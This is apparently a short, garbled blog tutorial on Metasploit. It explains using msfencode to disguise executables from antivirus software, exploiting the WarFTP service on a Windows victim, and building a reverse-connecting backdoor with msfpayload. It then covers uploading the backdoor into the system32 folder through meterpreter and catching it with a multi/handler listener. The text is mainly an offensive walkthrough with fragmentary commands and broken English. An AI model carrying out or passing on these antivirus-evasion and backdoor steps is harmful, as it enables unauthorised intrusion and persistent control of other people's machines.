While
Msfencode is a useful tool that alters the code in anexecutable so that it looks different to antivirus software but will still run the same way. Much as the binary attachment in email is encoded in Base64,msfencode encodes the original executable in a new binary. Then, when theexecutable is run, msfencode decodes the original code into memory and exe-cutes it. You can use msfencode -h to see a list of msfencode usage options. Of the msfencode options, the encoder formats are among the most important. For alist of encoder formats, we use msfencode -l , as shown next. Notice that differ-ent encoders are used for different platforms, because, for example, aPowerPC (PPC) encoder will not operate correctly on an x86 platform because of differences in the two architectures
This tool has many different options and variables available to it, but they may not all be fully realized given the limited output in the help banner.
we can use msfpayload -l to see all payload off msfpayload
=========== >>>>
OK Let's Exploit using msfpayload
1. we must know service enumeration
On this case i will do exploitation with Warftp on Sistem Operation W**ndows
2. After we know information about port and ip of Victim, open msfconsole
LHOST = your IP
RHOST = ip Victim
RPORT = Service Enumeration of Application (Warftp)
set Target
Set PAYLOAD
Let's show option
ok after we accept our exploit.. let's doing exploitation.. (applocation warftp must run)
3. Create Backdoor using msfpayload
open new terminal
root@justview:~# cd /opt/framework/msf3/
root@justview:/opt/framework/msf3# ./msfpayload -l
we will using msfpaylaod with combination msfencode
move reverse.exe to /root
root@justview:/opt/framework/msf3# mv hajar.exe /root/
4. Uplaod the Backdoor into win****s at C://windows//system32
Back to your meterpreter
after that execute the Backdoor (payload)
5. Execute Backdoor
open new terminal and run msfconsole
msf > use exploit/multi/handler
Tidak ada komentar:
Posting Komentar